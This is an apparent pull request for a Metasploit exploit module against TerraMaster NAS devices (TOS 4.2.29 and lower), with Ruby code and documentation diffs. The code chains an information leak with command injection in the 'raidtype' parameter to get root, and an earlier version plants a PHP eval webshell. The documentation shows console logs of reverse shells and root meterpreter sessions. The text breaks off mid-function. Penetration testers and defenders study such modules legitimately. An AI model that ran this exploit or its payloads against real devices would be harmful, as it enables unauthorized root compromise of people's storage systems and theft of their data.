### PR TITLE
TerraMaster unauthicated RCE a.k.a. TerrorMaster 3 [CVE-2022-24990]

### DIFF
--- a/documentation/modules/exploit/linux/http/terramaster_unauth_rce_cve_2022_24990.md
+++ b/documentation/modules/exploit/linux/http/terramaster_unauth_rce_cve_2022_24990.md
@@ -6,6 +6,8 @@ to achieve an unauthenticated RCE by exploiting vulnerable endpoint `api.php?mob
 admin password hash and mac address to achieve unauthenticated access and use the vulnerable endpoint`api.php?mobile/createRaid` with
 `POST` parameters `raidtype` / `diskstring` to upload a webshell and execute remote code as root on TerraMaster NAS devices.
 
+All TerraMaster devices running TerraMaster Operating System (TOS) `4.2.29` or lower are vulnerable.
+
 Installing a vulnerable test bed requires a TerraMaster NAS device that can run `TOS 4.x`
 This module has been tested against a TerraMaster `F2-221` Model with the specifications listed below:
 

--- a/documentation/modules/exploit/linux/http/terramaster_unauth_rce_cve_2022_24990.md
+++ b/documentation/modules/exploit/linux/http/terramaster_unauth_rce_cve_2022_24990.md
@@ -4,7 +4,7 @@ This module combines [CVE-2022-24990: Leaking sensitive information](https://cve
 [CVE-2022-24989: Authenticated remote code execution](https://www.redpacketsecurity.com/terramaster-tos-command-execution-cve-2022-24989/)
 to achieve an unauthenticated RCE by exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as
 admin password hash and mac address to achieve unauthenticated access and use the vulnerable endpoint`api.php?mobile/createRaid` with
-`POST` parameters `raidtype` / `diskstring` to upload a webshell and execute remote code as root on TerraMaster NAS devices.
+`POST` parameters `raidtype` / `diskstring` to execute remote code as root on TerraMaster NAS devices.
 
 All TerraMaster devices running TerraMaster Operating System (TOS) `4.2.29` or lower are vulnerable.
 
@@ -22,22 +22,12 @@ This module has been tested against a TerraMaster `F2-221` Model with the specif
 1. `set RPORT <port>`
 1. `set LHOST <attacker host ip>`
 1. `set LPORT <attacker host port>`
-1. `set TARGET <0-PHP, 1-Unix command or 2-Linux Dropper>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
 1. `exploit`
 1. You should get a `bash` shell or `meterpreter` session depending on the `target` and `payload` settings.
 
 ## Options
-
-### WEBSHELL
-You can use this option to set the filename and extension (should be .php) of the webshell.
-This is handy if you want to test the webshell upload and execution with different file names.
-to bypass any security settings on the Web and PHP server.
-
-### COMMAND
-This option provides the user to choose the PHP underlying shell command function to be used for execution.
-The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
-This option is only available when the target selected is either Unix Command or Linux Dropper.
-For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+No specific options.
 
 ## Scenarios
 
@@ -71,9 +61,8 @@ Module reliability:
 Available targets:
       Id  Name
       --  ----
-  =>  0   PHP
-      1   Unix Command
-      2   Linux Dropper
+  =>  0   Unix Command
+      1   Linux Dropper
 
 Check supported:
   Yes
@@ -90,14 +79,6 @@ Basic options:
   TARGETURI  /                yes       Path to Terramaster Web console
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host
-  WEBSHELL                    no        Web shell name with extension .php. Name will be randomly generated if left unset.
-
-
-  When TARGET is not 0:
-
-  Name     Current Setting  Required  Description
-  ----     ---------------  --------  -----------
-  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
 
 
   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
@@ -116,8 +97,8 @@ Description:
   and CVE-2022-24989, "Authenticated remote code execution".
   Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password
   hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint
-  `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to upload a webshell and
-  execute remote code as root on TerraMaster NAS devices.
+  `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to execute remote code as root
+  on TerraMaster NAS devices.
 
 References:
   https://nvd.nist.gov/vuln/detail/CVE-2022-24990
@@ -130,7 +111,7 @@ References:
 View the full module info with the info -d command.
 ```
 
-### TerraMaster F2-221 TOS 4.2.08 - PHP native `php/meterpreter/reverse_tcp` session
+### TerraMaster F2-221 TOS 4.2.08 - Unix Command `cmd/unix/reverse_bash` session
 ```
 msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > set target 0
 target => 0
@@ -139,31 +120,8 @@ msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > exploit
 [*] Started reverse TCP handler on 192.168.10.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target is vulnerable. TOS version is 4.2.08 and CPU architecture is X64.
-[*] Executing PHP for php/meterpreter/reverse_tcp
-[*] Sending stage (39927 bytes) to 127.0.0.1
-[+] Deleted cuckoo.php
-[*] Meterpreter session 1 opened (192.168.10.1:4444 -> 192.168.10.2:55766) at 2023-06-10 12:20:10 +0000
-
-meterpreter > sysinfo
-Computer    : TerrorMaster
-OS          : Linux TerrorMaster 4.13.16 SMP Mon Jun 10 14:20:56 CET 2023 x86_64
-Meterpreter : php/linux
-meterpreter > getuid
-Server username: root
-meterpreter >
-```
-### TerraMaster F2-221 TOS 4.2.08 - Unix Command `cmd/unix/reverse_bash` session
-```
-msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > set target 1
-target => 1
-msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > exploit
-
-[*] Started reverse TCP handler on 192.168.10.1:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable. TOS version is 4.2.08 and CPU architecture is X64.
 [*] Executing Unix Command for cmd/unix/reverse_bash
-[+] Deleted cuckoo.php
-[*] Command shell session 2 opened (192.168.10.1:4444 -> 192.168.10.2:54556) at 2023-06-10 12:31:22 +0000
+[*] Command shell session 1 opened (192.168.10.1:4444 -> 192.168.10.2:54556) at 2023-06-10 12:31:22 +0000
 
 uname -a
 Linux TerrorMaster 4.13.16 SMP Mon Jun 10 14:32:13 CET 2023 x86_64 GNU/Linux
@@ -172,8 +130,8 @@ uid=0(root) gid=0(root) groups=0(root)
 ```
 ### TerraMaster F2-221 TOS 4.2.08 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
 ```
-msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > set target 2
-target => 2
+msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > set target 1
+target => 1
 msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > exploit
 
 [*] Started reverse TCP handler on 192.168.10.1:4444
@@ -181,8 +139,7 @@ msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > exploit
 [+] The target is vulnerable. TOS version is 4.2.08 and CPU architecture is X64.
 [*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
 [*] Sending stage (3045348 bytes) to 127.0.0.1
-[+] Deleted cuckoo.php
-[*] Meterpreter session 3 opened (192.168.10.1:4444 -> 192.168.10.2:46174) at 2023-06-10 12:39:01 +0000
+[*] Meterpreter session 2 opened (192.168.10.1:4444 -> 192.168.10.2:46174) at 2023-06-10 12:39:01 +0000
 [*] Command Stager progress - 100.00% done (810/810 bytes)
 
 meterpreter > sysinfo

--- a/documentation/modules/exploit/linux/http/terramaster_unauth_rce_cve_2022_24990.md
+++ b/documentation/modules/exploit/linux/http/terramaster_unauth_rce_cve_2022_24990.md
@@ -3,7 +3,7 @@
 This module combines [CVE-2022-24990: Leaking sensitive information](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24990) and
 [CVE-2022-24989: Authenticated remote code execution](https://www.redpacketsecurity.com/terramaster-tos-command-execution-cve-2022-24989/)
 to achieve an unauthenticated RCE by exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as
-admin password hash and mac address to achieve unauthenticated access and use the vulnerable endpoint`api.php?mobile/createRaid` with
+admin password hash and mac address to achieve unauthenticated access and use the vulnerable endpoint `api.php?mobile/createRaid` with
 `POST` parameters `raidtype` / `diskstring` to execute remote code as root on TerraMaster NAS devices.
 
 All TerraMaster devices running TerraMaster Operating System (TOS) `4.2.29` or lower are vulnerable.

--- a/documentation/modules/exploit/linux/http/terramaster_unauth_rce_cve_2022_24990.md
+++ b/documentation/modules/exploit/linux/http/terramaster_unauth_rce_cve_2022_24990.md
@@ -1,0 +1,198 @@
+## Vulnerable Application
+
+This module combines [CVE-2022-24990: Leaking sensitive information](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24990) and
+[CVE-2022-24989: Authenticated remote code execution](https://www.redpacketsecurity.com/terramaster-tos-command-execution-cve-2022-24989/)
+to achieve an unauthenticated RCE by exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as
+admin password hash and mac address to achieve unauthenticated access and use the vulnerable endpoint`api.php?mobile/createRaid` with
+`POST` parameters `raidtype` / `diskstring` to upload a webshell and execute remote code as root on TerraMaster NAS devices.
+
+Installing a vulnerable test bed requires a TerraMaster NAS device that can run `TOS 4.x`
+This module has been tested against a TerraMaster `F2-221` Model with the specifications listed below:
+
+* TerraMaster F2-221
+* CPU: `x86`
+* TOS Version: `4.2.08`
+
+## Verification Steps
+
+1. `use exploit/linux/http/terramaster_unauth_rce_cve_2022_24990`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-PHP, 1-Unix command or 2-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the `target` and `payload` settings.
+
+## Options
+
+### WEBSHELL
+You can use this option to set the filename and extension (should be .php) of the webshell.
+This is handy if you want to test the webshell upload and execution with different file names.
+to bypass any security settings on the Web and PHP server.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+
+```
+msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > info
+
+       Name: TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989
+     Module: exploit/linux/http/terramaster_unauth_rce_cve_2022_24990
+   Platform: Unix, Linux
+       Arch: cmd, php, x64, x86, aarch64
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2022-03-07
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Octagon Networks
+  0xf4n9x
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   PHP
+      1   Unix Command
+      2   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
+                                        tml
+  RPORT      8181             yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       Path to Terramaster Web console
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+  WEBSHELL                    no        Web shell name with extension .php. Name will be randomly generated if left unset.
+
+
+  When TARGET is not 0:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0
+                                      .0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  This module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS 4.2.29
+  and lower by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information"
+  and CVE-2022-24989, "Authenticated remote code execution".
+  Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password
+  hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint
+  `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to upload a webshell and
+  execute remote code as root on TerraMaster NAS devices.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2022-24990
+  https://nvd.nist.gov/vuln/detail/CVE-2022-24989
+  https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
+  https://github.com/0xf4n9x/CVE-2022-24990
+  https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990
+
+
+View the full module info with the info -d command.
+```
+
+### TerraMaster F2-221 TOS 4.2.08 - PHP native `php/meterpreter/reverse_tcp` session
+```
+msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > set target 0
+target => 0
+msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > exploit
+
+[*] Started reverse TCP handler on 192.168.10.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. TOS version is 4.2.08 and CPU architecture is X64.
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 127.0.0.1
+[+] Deleted cuckoo.php
+[*] Meterpreter session 1 opened (192.168.10.1:4444 -> 192.168.10.2:55766) at 2023-06-10 12:20:10 +0000
+
+meterpreter > sysinfo
+Computer    : TerrorMaster
+OS          : Linux TerrorMaster 4.13.16 SMP Mon Jun 10 14:20:56 CET 2023 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: root
+meterpreter >
+```
+### TerraMaster F2-221 TOS 4.2.08 - Unix Command `cmd/unix/reverse_bash` session
+```
+msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > set target 1
+target => 1
+msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > exploit
+
+[*] Started reverse TCP handler on 192.168.10.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. TOS version is 4.2.08 and CPU architecture is X64.
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted cuckoo.php
+[*] Command shell session 2 opened (192.168.10.1:4444 -> 192.168.10.2:54556) at 2023-06-10 12:31:22 +0000
+
+uname -a
+Linux TerrorMaster 4.13.16 SMP Mon Jun 10 14:32:13 CET 2023 x86_64 GNU/Linux
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+### TerraMaster F2-221 TOS 4.2.08 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session
+```
+msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > set target 2
+target => 2
+msf6 exploit(linux/http/terramaster_unauth_rce_cve_2022_24990) > exploit
+
+[*] Started reverse TCP handler on 192.168.10.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. TOS version is 4.2.08 and CPU architecture is X64.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045348 bytes) to 127.0.0.1
+[+] Deleted cuckoo.php
+[*] Meterpreter session 3 opened (192.168.10.1:4444 -> 192.168.10.2:46174) at 2023-06-10 12:39:01 +0000
+[*] Command Stager progress - 100.00% done (810/810 bytes)
+
+meterpreter > sysinfo
+Computer     : 192.168.10.2
+OS           :  (Linux 4.13.16)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter >
+```
+
+## Limitations
+No limitations.

--- a/modules/exploits/linux/http/terramaster_unauth_rce_cve_2022_24990.rb
+++ b/modules/exploits/linux/http/terramaster_unauth_rce_cve_2022_24990.rb
@@ -25,8 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote
           and CVE-2022-24989, "Authenticated remote code execution".
           Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password
           hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint
-          `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to upload a webshell and
-          execute remote code as root on TerraMaster NAS devices.
+          `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to execute remote code as root
+          on TerraMaster NAS devices.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -43,20 +43,9 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2022-03-07',
         'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],
         'Privileged' => true,
         'Targets' => [
-          [
-            'PHP',
-            {
-              'Platform' => 'php',
-              'Arch' => ARCH_PHP,
-              'Type' => :php,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
-              }
-            }
-          ],
           [
             'Unix Command',
             {
@@ -74,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'linux',
               'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
               'Type' => :linux_dropper,
-              'CmdStagerFlavor' => ['printf', 'echo', 'bourne', 'wget', 'curl'],
+              'CmdStagerFlavor' => ['bourne', 'wget', 'curl'],
               'DefaultOptions' => {
                 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
               }
@@ -94,10 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     )
     register_options([
-      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/']),
-      OptString.new('WEBSHELL', [false, 'Web shell name with extension .php. Name will be randomly generated if left unset.', nil]),
-      OptEnum.new('COMMAND',
-                  [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])
+      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/'])
     ])
   end
 
@@ -133,23 +119,12 @@ class MetasploitModule < Msf::Exploit::Remote
     return Digest::MD5.hexdigest(id.encode('utf-8'))
   end
 
-  def upload_webshell
-    # randomize file name if option WEBSHELL is not set
-    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : datastore['WEBSHELL'].to_s)
-
-    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
-    @get_param = Rex::Text.rand_text_alphanumeric(1..8)
-
-    # Upload PHP payload using vulnerable endpoint `api.php?mobile/createRaid`
+  def execute_command(cmd, _opts = {})
+    # Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`
     # CVE-2022-24989
-    webshell = if target['Type'] == :php
-                 "echo '<?php @eval(base64_decode(\$_POST[\"#{@post_param}\"]));?>' > #{@webshell_name}"
-               else
-                 "echo '<?=\$_GET[\"#{@get_param}\"](base64_decode(\$_POST[\"#{@post_param}\"]));?>' > #{@webshell_name}"
-               end
     diskstring = Rex::Text.rand_text_alpha_upper(4..8)
 
-    return send_request_cgi({
+    send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/createRaid'),
       'ctype' => 'application/x-www-form-urlencoded',
@@ -157,11 +132,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'User-Agent' => 'TNAS',
         'Authorization' => @data['password'],
         'Signature' => @data['signature'],
-        'Timestamp' => @data['timestamp'],
-        'Upgrade-Insecure-Requests' => '1'
+        'Timestamp' => @data['timestamp']
       },
       'vars_post' => {
-        'raidtype' => ';' + webshell.to_s,
+        'raidtype' => ';' + cmd,
         'diskstring' => diskstring.to_s
       }
     })
@@ -195,34 +169,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def execute_php(cmd, _opts = {})
-    payload = Base64.strict_encode64(cmd)
-    send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'module', @webshell_name),
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_post' => {
-        @post_param => payload
-      }
-    })
-  end
-
-  def execute_command(cmd, _opts = {})
-    payload = Base64.strict_encode64(cmd)
-    php_cmd_function = datastore['COMMAND']
-    send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'module', @webshell_name),
-      'ctype' => 'application/x-www-form-urlencoded',
-      'vars_get' => {
-        @get_param => php_cmd_function
-      },
-      'vars_post' => {
-        @post_param => payload
-      }
-    })
-  end
-
   def check
     get_terramaster_info
     return CheckCode::Safe if @terramaster.empty?
@@ -239,14 +185,8 @@ class MetasploitModule < Msf::Exploit::Remote
     get_data
     fail_with(Failure::BadConfig, 'Can not retrieve the leaked data.') if @data.empty?
 
-    res = upload_webshell
-    fail_with(Failure::UnexpectedReply, 'Web shell upload error.') unless res && (res.code == 200) && res.body.include?('createRaid successful') && res.body.include?('true')
-    register_file_for_cleanup(@webshell_name.to_s)
-
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']
-    when :php
-      execute_php(payload.encoded)
     when :unix_cmd
       execute_command(payload.encoded)
     when :linux_dropper

--- a/modules/exploits/linux/http/terramaster_unauth_rce_cve_2022_24990.rb
+++ b/modules/exploits/linux/http/terramaster_unauth_rce_cve_2022_24990.rb
@@ -181,7 +181,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    # get the leaked data
     get_data
     fail_with(Failure::BadConfig, 'Can not retrieve the leaked data.') if @data.empty?
 

--- a/modules/exploits/linux/http/terramaster_unauth_rce_cve_2022_24990.rb
+++ b/modules/exploits/linux/http/terramaster_unauth_rce_cve_2022_24990.rb
@@ -1,0 +1,258 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'digest/md5'
+require 'time'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS 4.2.29
+          and lower by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information"
+          and CVE-2022-24989, "Authenticated remote code execution".
+          Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password
+          hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint
+          `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to upload a webshell and
+          execute remote code as root on TerraMaster NAS devices.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Octagon Networks', # Discovery
+          '0xf4n9x' # POC
+        ],
+        'References' => [
+          ['CVE', '2022-24990'],
+          ['CVE', '2022-24989'],
+          ['URL', 'https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/'],
+          ['URL', 'https://github.com/0xf4n9x/CVE-2022-24990'],
+          ['URL', 'https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990']
+        ],
+        'DisclosureDate' => '2022-03-07',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['printf', 'echo', 'bourne', 'wget', 'curl'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8181,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/']),
+      OptString.new('WEBSHELL', [false, 'Web shell name with extension .php. Name will be randomly generated if left unset.', nil]),
+      OptEnum.new('COMMAND',
+                  [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])
+    ])
+  end
+
+  def get_data
+    # Initialise variable data to store the leaked data
+    @data = {}
+
+    # Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`
+    # CVE-2022-24990
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/webNasIPS'),
+      'headers' => {
+        'User-Agent' => 'TNAS'
+      }
+    })
+    if res && res.code == 200 && res.body.include?('webNasIPS successful')
+      # Parse the JSON response and get the data such as admin password hash and MAC address
+      res_json = res.get_json_document
+      unless res_json.blank?
+        @data['password'] = res_json['data'].split('PWD:')[1].split('SAT')[0].strip
+        @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip
+        @data['key'] = @data['mac'][6..11] # last three MAC address entries
+        @data['timestamp'] = Time.new.to_i.to_s
+        # derive signature
+        @data['signature'] = tos_encrypt_str(@data['key'], @data['timestamp'])
+      end
+    end
+  end
+
+  def tos_encrypt_str(key, str_to_encrypt)
+    id = key + str_to_encrypt
+    return Digest::MD5.hexdigest(id.encode('utf-8'))
+  end
+
+  def upload_webshell
+    # randomize file name if option WEBSHELL is not set
+    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : datastore['WEBSHELL'].to_s)
+
+    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+    @get_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+    # Upload PHP payload using vulnerable endpoint `api.php?mobile/createRaid`
+    # CVE-2022-24989
+    webshell = if target['Type'] == :php
+                 "echo '<?php @eval(base64_decode(\$_POST[\"#{@post_param}\"]));?>' > #{@webshell_name}"
+               else
+                 "echo '<?=\$_GET[\"#{@get_param}\"](base64_decode(\$_POST[\"#{@post_param}\"]));?>' > #{@webshell_name}"
+               end
+    diskstring = Rex::Text.rand_text_alpha_upper(4..8)
+
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/createRaid'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'User-Agent' => 'TNAS',
+        'Authorization' => @data['password'],
+        'Signature' => @data['signature'],
+        'Timestamp' => @data['timestamp'],
+        'Upgrade-Insecure-Requests' => '1'
+      },
+      'vars_post' => {
+        'raidtype' => ';' + webshell.to_s,
+        'diskstring' => diskstring.to_s
+      }
+    })
+  end
+
+  def get_terramaster_info
+    # get Terramaster CPU architecture (X64 or ARM64) and TOS version
+    @terramaster = {}
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'tos', 'index.php?user/login')
+    })
+
+    if res && res.body && res.code == 200
+      # get the version information from the request response like below:
+      # <link href="./static/style/bootstrap.css?ver=TOS3_A1.0_4.2.07" rel="stylesheet"/>
+      return if res.body.match(/ver=.+?"/).nil?
+
+      version = res.body.match(/ver=.+?"/)[0]
+      # check if architecture is ARM64 or X64
+      if version.match(/_A/)
+        @terramaster['cpu_arch'] = 'ARM64'
+      elsif version.match(/_S/) || version.match(/_Q/)
+        @terramaster['cpu_arch'] = 'X64'
+      else
+        @terramaster['cpu_arch'] = 'UNKNOWN'
+      end
+
+      # strip TOS version number and remove trailing double quote.
+      @terramaster['tos_version'] = version.split('.0_')[1].chop
+    end
+  end
+
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'module', @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def execute_command(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    php_cmd_function = datastore['COMMAND']
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'module', @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        @get_param => php_cmd_function
+      },
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def check
+    get_terramaster_info
+    return CheckCode::Safe if @terramaster.empty?
+
